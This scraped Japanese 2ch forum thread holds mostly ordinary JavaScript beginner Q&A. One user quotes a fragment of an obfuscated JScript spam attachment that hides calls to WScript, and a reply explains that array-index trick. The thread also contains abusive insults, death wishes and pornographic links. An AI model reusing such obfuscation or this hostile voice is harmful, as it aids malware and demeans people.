2ちゃんねる★スマホ版★■掲示板に戻る■全部1-最新50
レス数が1000を超えています。これ以上書き込みはできません。

JavaScript の質問用スレッド vol.132 [無断転載禁止]©2ch.net

1 :
2017/01/24(火) 22:42:44.11 ID:???
JavaScript を自ら学ぶ人のための質問スレッドです。
>>2-5のテンプレを読んだ上で質問してください。次スレは>>950>>2のテンプレ案(本スレで改善案があれば考慮)を元に立ててください
(前スレでワッチョイ化の提案がありましたが、Web制作板のSETTING.TXTでBBS_USE_VIPQ2が2以上でない為、使用できないようです)

■質問を書く上で
(1) 煽り、コード制作依頼等、人を不快にさせる投稿はご遠慮下さい。公序良俗を守った応対を心がけてください。
(2) 他の人に迷惑をかけるスクリプトの質問はご遠慮ください(ブラクラ、[戻る], [閉じる], [クリック] の妨害、画面占有など)。
(3) 質問者及び議論を行う人はメール欄を空欄にし、名前にレス番を入れることを強く推奨します。回答者はなりすましを判断できませんので、なりすましが現れても自己責任となります。
(4) 常に自発的に調べる心構えを持ってください。
  具体的には「自分で調べてから質問する」「回答をもらってわからない単語があればGoogle検索してみる」など。
  わからない内容を代わりに調べてくれる回答者をお望みの方は余所で質問してください。
(5) 出来るだけ一般的な用語を使用してください。脳内オレオレ用語は混乱の元です。
(6) 出来るだけサンプルコードを掲示してください。言葉による説明は行き違いが生まれる場合があります。
  ※必ず「問題の事象が再現されること」を確認してください。
   必要な部分だけ切り出したつもりで現象が再現できていなかったケアレスミスがしばしば見られます。
(7) サンプルコードに HTML が含まれる場合は http://validator.w3.org/ で [Check] してみてください。
(8) 質問を具体的かつ詳細に書くと回答を得られやすいです。>>2の質問テンプレートを活用してみてください。
(9) ライブラリ関連の話題は禁止です。関連スレにあるライブラリ質問スレで質問して下さい。
(10) 時にはあなたが望む「答え」だけでなく、「意見」などが寄せられる場合もあります。
2 :
2017/01/24(火) 22:44:04.21 ID:???
■質問テンプレート
【環境】OS, ブラウザをバージョンと共に記入してください。(ex: IE8, Firefox4)
【何をしたのか】何をしたら問題の現象が発生するのか。再現手順を具体的に書いてください。
【エラーメッセージ】エラーメッセージがあれば正確に書き写してください。(Windows なら「コピット」を活用)
【期待する結果】最終的にどういう結果を望んでいるのか、を書いてください。
【サンプルコード】現象を再現可能な最小限のコードを書いてください。
 1レスに収まらないならコード投稿サイトを利用してください。
 http://jsdo.it/ http://jsbin.com/ http://jsfiddle.net/ http://ideone.com/

■前スレ
JavaScript の質問用スレッド vol.131
http://echo.2ch.net/test/read.cgi/hp/1478053599/

■過去スレ全集
http://www2.atpages.jp/mirror/2ch/javascript/
http://usamimi.info/~mirrorhenkan/2ch/javascript/ (閲覧のみ)

■テンプレ案
http://fiddle.jshell.net/fH4cC/182/show/light/

■関連スレ
JavaScript の質問用スレッド vol.122
http://echo.2ch.net/test/read.cgi/tech/1472426483/
JavaScript(ECMAScript)質問用スレッド vol.122
http://echo.2ch.net/test/read.cgi/tech/1472401404/
JavaScript ライブラリ総合質問所 vol.5
http://echo.2ch.net/test/read.cgi/hp/1465399470/
jQuery 質問スレッド vol.7
http://echo.2ch.net/test/read.cgi/hp/1478055094/
3 :
2017/01/24(火) 22:45:02.86 ID:???
■FAQ
http://fiddle.jshell.net/vSqKr/44/show/light/

◆開発者ツール(Developer Tools)の基本的な使い方 (全部はhttp://fiddle.jshell.net/vSqKr/44/show/light/#Browser-Developer-Tools )
 ▼諸注意
  - 本説明では Google Chrome の開発者ツールの名称に従います。他ブラウザで使う場合は適宜読み替えて下さい。
  - IE9- でコンソールを使うには予め開発者ツールを起動しておく必要があります(開発者ツールを起動しないと console.log() が機能しません)
  - Safari はデフォルトで開発者ツールが無効な為、有効に設定する必要があります。
  https://developer.apple.com/library/safari/documentation/AppleApplications/Conceptual/Safari_Developer_Guide/GettingStarted/GettingStarted.html
 ▼要素を検証
 1. ページ上で右クリックして [要素を検証]
 2. [Elements] パネルが開き、対象のDOMノードが選択される(選択対象が目的の要素でなければ [Elements] パネル上で選択し直す)
 3. 右側のサイドバーから知りたいステータス名のタブを選択する
   - [Styles] タブ … CSSプロパティの指定値を表示 (※カスケードによって上書きされたプロパティは取り消し線で表示される)
   - [Computed] タブ … CSSプロパティの算出値を表示("font-size: 1em" を指定していても算出後の "*px" で表示される)
   - [Properties] タブ … 選択したDOMノードのプロパティを表示
 ▼コンソール
 1. JavaScript コード上で console.log('Hello, World!'); と入力
 2. [Ctrl] + [Shift] + [I] キー(IE は [F12])で開発者ツールを開き、[Console] パネルを開く
 3. [Console] パネルに "Hello, World!" と表示される
 (※window.alert() は String 型に変換されますが、console.log() は Object 型の中身をそのまま表示してくれます。)
4 :
2017/01/24(火) 22:46:09.59 ID:???
■FAQ(続き)
◆JavaScriptの実行速度
JavaScriptの速度は「ブラウザ名」「ブラウザのバージョン」「PCスペック」に依存します(ブラウザのバージョン毎に最適化具合が異なります)。
速度の疑問解消の為に http://jsperf.com/ にコードをUPしてブラウザ毎に速度計測する事を推奨します。
例外として、仕様における理論上の速度が明確になっている場合があります。
例えば、正規表現によるマッチング処理を考えた場合、「RegExp#test > RegExp#exec > String#match」は ES5 仕様で保証されています。
ES5 仕様において RegExp#test が最も処理数が少なく、String#match が最も処理数が多いことが明確だからです。
ブラウザによっては RegExp#test の最適化が十分でなく、String#match の最適化が RegExp#test より十分であれば逆転する可能性はありますが、各メソッドの最適化が一律であればこの前提が崩れる事はありません。

■各種仕様 ( http://fiddle.jshell.net/vSqKr/44/show/light/#Link も参照 )
◆ Standard ECMA-262
http://bclary.com/2004/11/07/ (ECMAScript 3 HTML版)
http://www2u.biglobe.ne.jp/~oz-07ams/2002/ecma262r3/ (ECMAScript 3 和訳)
http://www.ecma-international.org/ecma-262/5.1/ (ECMAScript 5.1 HTML版)
http://tsofthome.appspot.com/ecmascript.html (ECMAScript 5.1 和訳)
http://www.ecma-international.org/ecma-262/6.0/ (ECMAScript 6 / ECMAScript 2015)
http://kangax.github.io/compat-table/es5/ (ECMAScript 5 compatibility table)
http://kangax.github.io/compat-table/es6/ (ECMAScript 6 compatibility table)
◆ HTML Standard (HTML5)
http://www.whatwg.org/specs/web-apps/current-work/multipage/
http://momdo.s35.xrea.com/web-html-test/spec/WD-html51-20130528/Overview.html (HTML5.1 部分訳)
http://www.hcn.zaq.ne.jp/___/WEB/WebStorage-ja.html (Web Storage 和訳)
5 :
2017/01/24(火) 22:47:11.77 ID:???
■各種仕様 (続き)
◆ Document Object Model (DOM) / CSS Object Model (CSSOM)
http://www.hcn.zaq.ne.jp/___/WEB/DOM4-ja.html (DOM Standard (DOM4) 和訳)
http://www.w3.org/TR/DOM-Level-3-Events/ (DOM3 Events)
http://www.w3.org/TR/uievents/ (UI Events)
http://www.hcn.zaq.ne.jp/___/WEB/cssom-ja.html (CSSOM 和訳)
http://www.hcn.zaq.ne.jp/___/WEB/cssom-view-ja.html (CSSOM View Module 和訳)
◆ その他のWeb関連仕様
http://domparsing.spec.whatwg.org/ (DOM Parsing and Serialization - innerHTML等)
http://www.hcn.zaq.ne.jp/___/WEB/XHR-ja.html (XMLHttpRequest 和訳)
http://www.hcn.zaq.ne.jp/___/WEB/File_API-ja.html (File API 和訳)
http://www.whatwg.org/specs/ (WHATWGの仕様一覧)
◆ MDN (Netscape/Mozilla)
https://developer.mozilla.org/ja/docs
◆ MSDN Library
https://msdn.microsoft.com/en-us/library/ie/hh828809 (Internet Explorer API)
http://msdn.microsoft.com/ja-jp/library/yek4tbz0.aspx (JavaScript)
http://msdn.microsoft.com/ja-jp/library/cc427807.aspx (JScript)
http://msdn.microsoft.com/ja-jp/library/cc409712.aspx (DHTML)
◆ JavaScript Garden (ja)
http://bonsaiden.github.com/JavaScript-Garden/ja/
◆ JSON (JavaScript Object Notation)
http://www.json.org/json-ja.html

■諸注意
質問の要件に曖昧な点があれば質問者に補足要求して下さい。回答に対して訂正を求める行為は禁止ではありませんが、節度ある態度でお願いします。

vol.115でlodashを不必要に推奨して啓蒙する行為が多く確認されており、ライブラリ系の話題はvol.116から禁止されました。
vol.115,116ではライブラリ禁止する発言が見られた直後にライブラリを許可する意図で次スレを立てる行為が確認されています。
本スレッドでライブラリ許可を求める発言が確認された場合は不要な争いを避ける為、スルーすることを推奨します。
ライブラリの話題はライブラリスレへ誘導し、誘導行為への反論はスルーしてください。
6 :
2017/01/24(火) 22:49:55.60 ID:???
テンプレ終了。

■次スレのテンプレ
http://fiddle.jshell.net/fH4cC/183/show/light/
7 :
2017/01/24(火) 22:50:51.94 ID:???
8 :
2017/01/25(水) 01:27:54.24 ID:???
age
9 :
Name_Not_Found
2017/01/25(水) 23:48:04.13 ID:epcHDesv
<script>で質問です
<body onload="function()">や、
</html>の下に<script>を記述するサイト

を見かけます

未だにたまに見かけるんですが、なんででしょうか
10 :
2017/01/26(木) 13:24:39.63 ID:???
<body onload='function()'>は、DOMレベル0から使える表記方法

addEventListener は、DOMレベル2・IE9からしか使えない。
IE8までは、attachEvent を使っていた。
まあ互換性については、jQueryを使えば、自動的に判断してくれる

</html>の下に<script>を記述するサイトは、閉じタグで、DOMの構築が済んでいるから、
そこにDOMをいじるコードを書いても、安全だから

</body>の直前で、JSコードを読み込ませる方法もある
11 :
2017/01/26(木) 13:30:23.53 ID:???
>>10
おー、なるほど。古いブラウザに配慮した書き方なのですね
ありがとうございます
12 :
2017/01/26(木) 20:21:59.43 ID:???
>>11
> 古いブラウザに配慮した

そうではない。古いブラウザに配慮するだけならば
他にもっといいやり方がある。
13 :
Name_Not_Found
2017/01/27(金) 00:13:36.21 ID:yVLAI7k9
forで処理を実行した後にi=i+1するけどiの初期値が0だとしたらi=0+1になってi=1になるけ左辺のiと右辺のiは別なんでしょうか?そこがいまいち分かりません
14 :
2017/01/27(金) 00:55:14.04 ID:???
i = i + 1;

i は同じオブジェクト・プリミティブ

1. 先に右辺のiが参照される
2. 右辺の式を評価する
3. 評価した値を、左辺のiに代入する
15 :
2017/01/27(金) 01:46:53.66 ID:???
>>13
JavaScriptにおいて「=」は同じを意味する記号ではない
代入といおう意味の記号。同じという意味の記号は == や ===

プログラムは一般的に上から下へ、左から右へと実行されていくが、
i = i + 1 は逆。i + 1 を実行してから i に代入する

i (変数)というのは箱みたいなもの。
i = i + 1 というのは、iという箱から数値を取り出して
1を加えてから、同じ箱に戻すという動きをしている。



最後に一言煽っておくが、
>>13のような質問をする人はオブジェクト・プリミティブなんて
言っても意味がわからないし、参照や評価という言葉も知らない。
知っていたらこの質問内容は理解できているはず。
16 :
2017/01/27(金) 08:47:01.05 ID:???
vbaから来ると=を等号と捉えてしまうんだよね
俺がそうだった
17 :
Name_Not_Found
2017/01/27(金) 19:48:19.80 ID:NmTAjg2s
googlemapAPIのマーカーを押したときにajaxでデータを取りに行きたいのですが
イベントをセットする段階でデータを取りに行ってしまいます。
意図したタイミングでデータをとりにいくにはどうしたらいいでしょうか?



google.maps.event.addListener(markers[i], 'click',getikisakidat(apn);


function getikisakidat(apn) {


var txtList;

$.ajax({

url: 'ikisaki/' + apn + '.txt',
success: function(ikidat) {

// csvを配列に格納
txtList = $.csv()(ikidat);


}
});


}
18 :
2017/01/29(日) 10:04:43.21 ID:???
質問です
javascriptでメーラーを起動せずにウェブ上から任意のアドレスへフォーム等に
入力された情報を送信するにはどうしたら良いでしょうか?
19 :
2017/01/29(日) 10:19:55.67 ID:???
>>18
jsだけでメールは無理
phpかcgiが必要。そのページがあればajax+jsでもできるけど、やってることはsubmitと変わらん
20 :
2017/01/29(日) 10:55:08.66 ID:???
>>19
ありがとうございます
無知で申し訳ないのですがgmailなどのAPIを使う、とかでも無理でしょうか
21 :
2017/01/29(日) 11:01:33.19 ID:???
知らんwww
あるかもしれんがそれも
>phpかcgiが必要。そのページがあればajax+jsでもできるけど、やってることはsubmitと変わらん
と根本的には同じ事
22 :
2017/01/29(日) 11:25:20.04 ID:???
>>20
ドキュメントを読んでみたら?
https://developers.google.com/gmail/api/quickstart/js?hl=ja
23 :
2017/01/29(日) 11:29:03.96 ID:???
そこまでしてjsでメール送りたい理由とは
はっきり言ってかなりめんどくさいことをやろうとしているぞ
24 :
2017/01/29(日) 11:36:51.04 ID:???
つーかjsじゃメアド丸出しになると思うんだが
25 :
2017/01/29(日) 12:36:05.30 ID:???
用途は架空請求か?
26 :
2017/01/29(日) 12:40:43.37 ID:???
あぁ、jsならページ踏ませるだけでメール発射装置にできるからかw
考えるね〜
27 :
Name_Not_Found
2017/01/29(日) 12:44:05.24 ID:/bEqw6wS
知らないところからメールが来て、jsファイルの添付ファイルがあった。
これって何を狙っているんだろうか。

一部抜粋すると、

var qyfunuvri0 = ['qikerka', WScript][1][["xcaxyf", "baqitvy", "octanalc",
["ucfijga", "ybgyfa", "ltaw", "obe", "Cre"][4], "vatytbu", "ujokd", "ysipyl",
"ejbyvwo", "iryb", "ije", "umer", "ptyqozw", "nryfb", "ifwa", "xvuqo", "afzovfibq",
"avexoq", "bowsax"][3] + ["mgovirry", "bubveld", "esuk", "wkija", "ulwixex",
"errocy", "pkyrfuzk", "ltarsa", ["enkigu", "yfozzolv", "cliky", "pxidd", "ate"][4],

, "ylaqh", "imo"][13])()][20]) {
bhirojxy1 = this[["ufgapu", "apo", "utajquth", "glorohku",
"uxurbo", "kroxotv", "ebwe", "tjebxi",

こういうのが続いている。
28 :
2017/01/29(日) 12:55:30.33 ID:???
>>27
ただの配列初期化子
29 :
Name_Not_Found
2017/01/29(日) 13:00:03.44 ID:/bEqw6wS
>>28
レスありがとうございます。
怖いコードではなさそうですか。

悪意があるとしたら、単に配列を初期化するだけでは済まなさそうだから、
メーラーをクラッシュさせるとか可能性があるかもかな。
30 :
2017/01/29(日) 15:11:46.27 ID:???
JavaScript ベスト・オブ・ザ・イヤー 2016
https://risingstars2016.js.org/ja/

JavaScriptコミュニティは日々進化しています。今日のトレンドも数か月後には陳腐化しているなんてことは日常茶飯事です。

2016年は終わってしまいましたが、何か重要なことを見逃したのではないかと感じているそこのあなた! 2016年の主要なトレンドをおさらいして、そんな不安を払拭しちゃいましょう。

過去12か月に獲得された Github のスター数を比較して、2016年に支持を集めたプロジェクトを数値に基づいて評価していきます。

2015年はなんといっても React でした。そして、Flux 実装を席巻したのは Redux でしたね。 2016年、JavaScript の人気プロジェクトはどのようなものだったのでしょうか?
31 :
2017/01/29(日) 15:22:25.31 ID:???
> 過去12か月に獲得された Github のスター数を比較して

全スターの合計じゃない? 最近話題になったのが増えるだけじゃん
はい意味ない、さよなら
32 :
2017/01/29(日) 15:27:33.97 ID:???
>>21
ありがとうございます
すみません良く分かっていなかったです

>>22
ありがとうございます!読んでみましたがイマイチよく分からず・・・

>>23
e-mail:

message:

[post]

とあったとして、postボタンを押すとmessageに入力された文章がサイトに投稿され、
e-mailに入力された文章(アドレス)が自分のところのメールボックスに送られてくる

という機能を作りたかったのです。それで1つのボタンでワンタッチでできるにはjavaで
やるしかないのかと考えていた次第です
33 :
2017/01/29(日) 15:31:02.32 ID:???
>>30
そこで紹介されている下のほうがまともなデータだな
http://stateofjs.com/2016/introduction/

例えば、フロントエンドフレームワーク
http://stateofjs.com/2016/frontend/
Vueなんて全く使われてなくて
ReactがVueの5倍、Angularが3倍使われてる

テスト
http://stateofjs.com/2016/testing/
当然のごとくMochaやJasmineが一番使われてる。
Ava?Jest?なにそれw
34 :
2017/01/29(日) 15:35:40.97 ID:???
>>32
マルチ

ホリエモン、マシン語を使えるスーパープログラマーだった [無断転載禁止]©2ch.net [418558609]
http://hitomi.2ch.net/test/read.cgi/poverty/1485645604/

202 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウオーT Sa92-Hx4G)[] 投稿日:2017/01/29(日) 09:53:26.15 ID:v8CV8LRGa [1/3]
パソコンの大先生がいることを願って聞きたいんだが
WEBアプリでフォームに入力された情報を一つのボタンで複数の処理をするには
どうすればいいのでしょうか

例えば

e-mail:

message:

[post]

とあったとして、postボタンを押すとmessageに入力された文章がサイトに投稿され、
e-mailに入力された文章(アドレス)が自分のところのメールボックスに送られてくる

という風にしたい
もしお分かりになる方がいらっしゃいましたらお教え願います

242 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウオーT Sa92-Hx4G)[] 投稿日:2017/01/29(日) 10:14:19.30 ID:v8CV8LRGa [2/3]
>>217
ありがとう
jsでやるとメール送信するのにメーラー起動されるっぽいから避けたいんです
できるだけ一回の動作で簡潔したいので・・・
サーバーと分けるというのはCGI使ってやるってことですか?
質問ばっかですみません
35 :
2017/01/29(日) 15:38:07.14 ID:???
>>30もマルチ
36 :
2017/01/29(日) 15:40:19.90 ID:???
>>35
マルチって言っても質問じゃねーだろ。情報共有だ。
有益な情報は貼れよ。
37 :
2017/01/29(日) 15:54:32.70 ID:???
コピペ荒らしの自覚がないのかw
38 :
2017/01/29(日) 15:55:22.77 ID:???
>>37
荒らすなよカス死ね
39 :
2017/01/29(日) 15:57:34.71 ID:???
有益な内容であれば関連スレすべてに
コピペしてもかまわない。

新たなルールが生まれましたw
私もそれを支持しますwwww
40 :
2017/01/29(日) 16:00:21.88 ID:???
>>39
草生やすなコピペガイジ
41 :
2017/01/29(日) 16:00:58.55 ID:???
有益な内容であれば関連スレすべてに
コピペしてもかまわない。

新たなルールが生まれました笑
私もそれを支持します笑笑笑笑
42 :
2017/01/29(日) 16:01:45.35 ID:???
>>39
お前何の情報も貼らないし糞みたいな質問するだけじゃん
43 :
2017/01/29(日) 16:02:05.68 ID:???
>>41
コピペガイジ必死w
44 :
2017/01/29(日) 16:02:27.94 ID:???
泣くなよwww

41 名前:Name_Not_Found[sage] 投稿日:2017/01/29(日) 16:00:58.55 ID:???
有益な内容であれば関連スレすべてに
コピペしてもかまわない。

新たなルールが生まれました笑
私もそれを支持します笑笑笑笑
45 :
2017/01/29(日) 16:02:51.45 ID:???
どうしたクズ家族まとめて死ねや
46 :
2017/01/29(日) 16:05:09.99 ID:???
どうした?俺死んでないぞ?
残念、お前の願いは叶いませんでしたwww
47 :
2017/01/29(日) 16:06:27.38 ID:???
何で自分だと思ったん?
48 :
2017/01/29(日) 16:07:53.55 ID:???
情報共有は嫌いじゃないけど、質問スレで情報共有は邪魔
さすがにこれは>>36が悪い
49 :
2017/01/29(日) 16:08:20.43 ID:???
「死ね」に対して「死んでないぞ」っておかしいだろ
「死なないぞ」ならわかるけど「死んでないぞ」ってなんで過去形なんだよ
頭悪そう
50 :
2017/01/29(日) 16:09:10.34 ID:???
>>48
コピペガイジ荒らし乙
51 :
2017/01/29(日) 16:10:08.96 ID:???
>>49
正論だけどそろそろやめてくれ

>>50
と言われても俺も貼るけどなw
ありがたく読んでくれ
52 :
2017/01/29(日) 16:10:19.61 ID:???
>>48
このスレ質問スレだから質問とその回答以外書き込むなよ死ね
53 :
2017/01/29(日) 16:11:29.82 ID:???
もうそろそろ気づいたかね? お前のせいで荒れたんだよ
お前がいくら有益だと思った所で他の人はそうは思ってないし
他の人からすればマルチでしかなく邪魔なだけなんだよ
54 :
2017/01/29(日) 16:12:20.52 ID:???
情報共有するわ
http://i.imgur.com/vggwkG7.gif
55 :
2017/01/29(日) 16:13:06.91 ID:???
>>53
人のせいにすんなスルーしろお前が邪魔じゃボケ
56 :
2017/01/29(日) 16:13:42.61 ID:???
↑グロはいらん
57 :
2017/01/29(日) 16:14:05.48 ID:???
>>53
同意。ワッチョイつけない>>1の責任
58 :
2017/01/29(日) 16:14:39.44 ID:???
こっちのスレはいつもどおり荒れてるな
59 :
2017/01/29(日) 16:15:51.40 ID:???
じゃあ質問してやるよ

いちばんすごいジャバスクリプトのコードをおしえてください
一番すごくてつよいやつです
60 :
2017/01/29(日) 16:16:35.63 ID:???
>>53
お前がレスしなければ荒れなかったけどな
61 :
2017/01/29(日) 16:17:24.64 ID:???
ム板より遥かにレベルが低い板だから仕方ないね
62 :
2017/01/29(日) 16:17:31.79 ID:???
>>60
どうせ他の誰かがしてる
63 :
2017/01/29(日) 16:18:17.59 ID:???
>>62
責任転換すんな
64 :
2017/01/29(日) 16:18:54.16 ID:???
http://imgur.com/LaZnNvo.jpg
http://imgur.com/5GEcIdr.jpg
http://imgur.com/C4xpEjy.jpg
この人の描くパイズリ好きなんだか如何せん作品数と流通量が少なすぎる
65 :
2017/01/29(日) 16:20:33.90 ID:???
>>64
弾力感はすごいけどパイズリ自体そんなに好きじゃないからなんとも
66 :
2017/01/29(日) 16:20:35.77 ID:???
>>63
誰のせいにもしてないから責任転嫁ではない
67 :
2017/01/29(日) 16:22:17.73 ID:???
世間的には http://www.xvideos.com/ が有名だと思うけど、
http://www.thisav.com/ もなかなかマイナーなものがあって捨てがたい
68 :
2017/01/29(日) 16:24:49.37 ID:???
>>66
してるだろ、お前が誰かぶんなぐって
「あいつめっちゃ性格悪いからおれが殴らなくてもほかのやつが殴ってる」
って言ってるようなもんだろ
お前が殴ったんだからお前のせいだろ
69 :
2017/01/29(日) 16:25:14.12 ID:???
70 :
2017/01/29(日) 16:26:47.59 ID:???
>>68
つまりお前が書き込みしなければ
あれなかったってことだよ
71 :
2017/01/29(日) 16:27:31.02 ID:???
コピペしておいて、
お前がスルーしていれば荒れなかった
責任転嫁の何者でもないだろw
72 :
2017/01/29(日) 16:28:16.31 ID:???
>>65
現実のパイズリは全然気持ちよくないからな
73 :
2017/01/29(日) 16:28:32.68 ID:???
>>71
責任転換すんなや
74 :
2017/01/29(日) 16:28:49.60 ID:???
>>70
うるせー謝れ!
75 :
2017/01/29(日) 16:31:10.43 ID:???
質問スレで低レベルな質問に答えることに時間使ってるやつは成長しないよ
そんな時間があったら自分の技術を磨いた方がいい

質問に答えることで考えるきっかけになるとか
復讐になるなんて思ってるやつはいつまで経っても低レベル

もちろんお金をもらって仕事で質問に答えるのはいいと思うけどね

さっさとこのスレから去るのが自分のためだな
76 :
2017/01/29(日) 16:32:48.57 ID:???
>>72
それはすごい巨乳でテクの人にやってもらったことないからでは?
77 :
2017/01/29(日) 16:33:40.81 ID:???
コルトピみたいに貴重な能力だけど戦闘力低い奴どうすんだよ
78 :
2017/01/29(日) 16:35:41.87 ID:???
>>75
じゃあさっさと去れよ
79 :
2017/01/29(日) 16:36:37.78 ID:???
>>78
ちょっと待ってよー
もうちょいいさせてよー
スマンね
80 :
2017/01/29(日) 16:37:09.94 ID:???
真面目な会話をしたい人はこちらへどうぞ

+ JavaScript & jQuery 質問用スレッド vol.7 + [無断転載禁止]©2ch.net
http://echo.2ch.net/test/read.cgi/hp/1478002550/
81 :
2017/01/29(日) 16:37:49.13 ID:???
>>80
情報共有のためにURL貼るのは禁止だよ
82 :
2017/01/29(日) 16:38:28.67 ID:???
それは情報共有じゃないからOK
83 :
2017/01/29(日) 16:39:01.49 ID:???
何で>>32はjsでやろうとしてるん?
84 :
2017/01/29(日) 16:39:14.72 ID:???
>>81
× 情報共有のためにURL貼るのは禁止だよ
○ 情報共有のためにコピペするのは禁止だよ

コピペを正当化しようとするな
85 :
2017/01/29(日) 16:39:54.09 ID:???
>>83
jcはオバン
jsの方が可愛いから
86 :
2017/01/29(日) 16:41:32.01 ID:???
>>82
ダメだよ「真面目な会話をしたい人はこちらへどうぞ」というURLという
情報を共有するための書き込みだからね

質問と回答以外は禁止だよルール守ろうな
87 :
2017/01/29(日) 16:42:11.09 ID:???
>>84
責任転換すんなやお前のせいで荒れたんだろ
88 :
2017/01/29(日) 16:42:17.91 ID:???
>>86
だめなのはマルチ

マルチは指摘される
これらをみよ

34 名前:Name_Not_Found[sage] 投稿日:2017/01/29(日) 15:35:40.97 ID:???
>>32
マルチ

35 自分:Name_Not_Found[sage] 投稿日:2017/01/29(日) 15:38:07.14 ID:???
>>30もマルチ
89 :
2017/01/29(日) 16:43:21.04 ID:???
>>32
PHP簡単だよ
そのレベルの簡単なことやる初心者におすすめ
90 :
2017/01/29(日) 16:44:27.18 ID:???
>>88
マルチすんなよ見つけたぞ死ね
http://mercury.bbspink.com/test/read.cgi/mature/1453570688/23
91 :
2017/01/29(日) 16:44:56.20 ID:???
>>88
よくマルチしておいて人のこと言えるなお前
92 :
2017/01/29(日) 16:45:31.76 ID:???
>>88
マルチじゃないというなら証拠を提示してみろや
まず手始めにfushianaしろ
93 :
2017/01/29(日) 16:45:46.40 ID:???
>>88
どうしたこの野郎にげんじゃねーぞ
94 :
2017/01/29(日) 16:47:08.00 ID:???
マルチ禁止って規約のどこに書いてあるんだ?
95 :
2017/01/29(日) 16:48:37.12 ID:???
ttp://www.dotup.org/uploda/www.dotup.org1138859.jpg_nzR0BFmsVWTqgiyO0vMn/www.dotup.org1138859.jpg
96 :
2017/01/29(日) 16:49:44.18 ID:???
>>89
jsスレだからjsだけで実装するのがこのスレの仕事だろ
97 :
2017/01/29(日) 16:51:36.90 ID:???
逃げてんじゃねーよマルチ野郎
意味不明なスレでマルチしてんじゃねーぞハゲが
98 :
2017/01/29(日) 16:55:51.70 ID:???
質問者はこちらへどうぞ。
ワッチョイ付きなので荒らしの区別が付きやすいと思われます。

+ JavaScript の質問用スレッド vol.122 +
http://echo.2ch.net/test/read.cgi/tech/1472426483/
99 :
2017/01/29(日) 17:02:06.88 ID:???
>>98
またマルチで誘導してんのか
ほんとマルチすんなとかいいつつ自分はマルチして最低だなお前
http://echo.2ch.net/test/read.cgi/hp/1478002550/100
100 :
2017/01/29(日) 17:12:41.94 ID:???
マルチというより、架空請求者だろ?w
101 :
98
2017/01/29(日) 17:19:52.76 ID:jSlaNRsk
>>99
私ではありませんし、言いがかりですね。
憶測で非難していいならコピペされてからたった1分で見つけて指摘するあなたがなりすましではないかと疑いたくなるところですが(なりすましが怖いのでID出します)。

マルチポストは最低ですが、執拗にスレに張り付いて誰彼かまわずかみつく人も最低だと思います。
102 :
2017/01/29(日) 17:29:17.23 ID:???
>>101
だったら>>30がマルチってのも言いがかりだろ
憶測で非難して>>35とか最低だな
103 :
2017/01/29(日) 17:37:35.74 ID:???
>>72
ローション使わないと痛いよな
あと「そこでやらんでも・・・」感がすごい
104 :
2017/01/29(日) 17:38:19.77 ID:???
>>96
無理な事に対する代替案はいいだろう
105 :
Name_Not_Found
2017/01/29(日) 18:01:29.57 ID:C5kZvbfw
>>101
ageんじゃねーよ荒れるだろ
106 :
2017/01/29(日) 18:08:27.32 ID:???
>>104
node.jsでできるだろ
107 :
2017/01/29(日) 19:34:43.37 ID:???
>>83
JSじゃないとできないのかと思ってました

>>89
ありがとうございます。今の私には一番入口として良さそうなのでまずはPHPで
やってみます!みなさんありがとうございました
108 :
2017/01/29(日) 19:37:18.12 ID:???
>>107
それな、jsだとめっちゃムズイ。phpだとチョー簡単
サンプルも死ぬほどあるから直ぐにできると思うよ。ガンバレー
109 :
Name_Not_Found
2017/01/29(日) 22:08:24.64 ID:jSlaNRsk
>>102
それも私ではないのですが。
憶測で同一認定されても困ります。
110 :
2017/01/30(月) 00:49:56.18 ID:???
>>109
そんなこと言ってないから
日本語理解しろ
111 :
2017/01/30(月) 01:57:56.36 ID:???
日曜日のレスをちんたら読んでたら
よく見たら100突破してて吹いた
アホかお前ら
112 :
Name_Not_Found
2017/01/30(月) 02:02:13.61 ID:XAxgtG6P
>>110
>35は言いがかりかもしれませんが、私には無関係なのでその話は無意味です。
>>102は自己弁護にもなってませんし、ただ話をずらしにかかっているだけでしょう。
113 :
Name_Not_Found
2017/01/30(月) 10:45:50.91 ID:08nQ7DUE
114 :
2017/01/30(月) 11:22:07.26 ID:???
var increment = 0;
var result = 0;
for (var i = 0; i < 10; i++) {
increment += 0.1;
result = 0.1 + increment;
console.log(increment, result);
}
ふと気付いたので質問します
0.1 + 0.2 = 0.3 のはずですが、
実際には0.30000000000000004になります
これは正常なのでしょうか?
宜しくお願いします
115 :
Name_Not_Found
2017/01/30(月) 11:53:40.04 ID:XAxgtG6P
>>114
0.1+0.1+0.1 === 0.30000000000000004 は IEEE754 の浮動小数演算精度の仕様です。
厳密に演算したいなら整数演算する必要があります。
(0.1*10+0.1*10+0.1*10)/10 === 0.3
116 :
2017/01/30(月) 11:57:51.63 ID:???
浮動小数点数に面食らうのは誰もが通る道
117 :
2017/01/30(月) 12:30:19.64 ID:???
>>115
ありがとうございます
その辺りを勉強してみます
ちなみに Math.round((0.1+0.2)*10)/10 でも大丈夫ですか?
118 :
2017/01/30(月) 13:08:44.90 ID:???
>>27
それ WScript.Createなんとか が実行されちゃうんじゃないかな

たとえば
var foo = ['a', console][1][['b', 'lo'][1] + ['c', 'g'][1]](['d', 'test'][1]);
とかすると、console.log('test'); と同等だけどそんな感じで隠していると思う
119 :
2017/01/30(月) 15:13:12.79 ID:???
>>112
マルチすんなキチ
120 :
2017/01/30(月) 15:33:46.05 ID:???
121 :
2017/01/30(月) 15:50:51.96 ID:???
>>120
詳細
122 :
2017/01/30(月) 16:08:56.88 ID:???
ある<table>の直下の<tbody>にappendChild()で追加しまくった<tr>を消したいとき
<tr>はイベントリスナを一切触っていない前提だと

・<tbody>のinnerHTMLを空文字列にする
・removeChild()でひとつずつ消していく

この2つの方法で結果に違いはありますか?
123 :
2017/01/30(月) 16:22:19.07 ID:???
ないんじゃね 速度は違うと思うが

つかtbodyをremoveすればよくね
124 :
2017/01/30(月) 16:50:35.97 ID:???
>>122
var target = document.getElementsByTagName('tbody');
while (target.firstChild) target.removeChild(target.firstChild);
125 :
Name_Not_Found
2017/01/30(月) 17:06:11.28 ID:VseG2LWP
>>119
日本語の不勉強乙
126 :
2017/01/30(月) 18:04:23.58 ID:???
>>125
荒らすなよゴミ
127 :
2017/01/30(月) 18:52:11.19 ID:???
>>121
COMIC 夢幻転生 2016年9月号 世徒ゆうき「ラズベリーinc.」
128 :
2017/01/30(月) 19:10:18.84 ID:???
>>120
妹の方がかわいくないかこれ
129 :
2017/01/30(月) 21:20:29.03 ID:???
こんな痴女みたいな服着てるやついないやろ
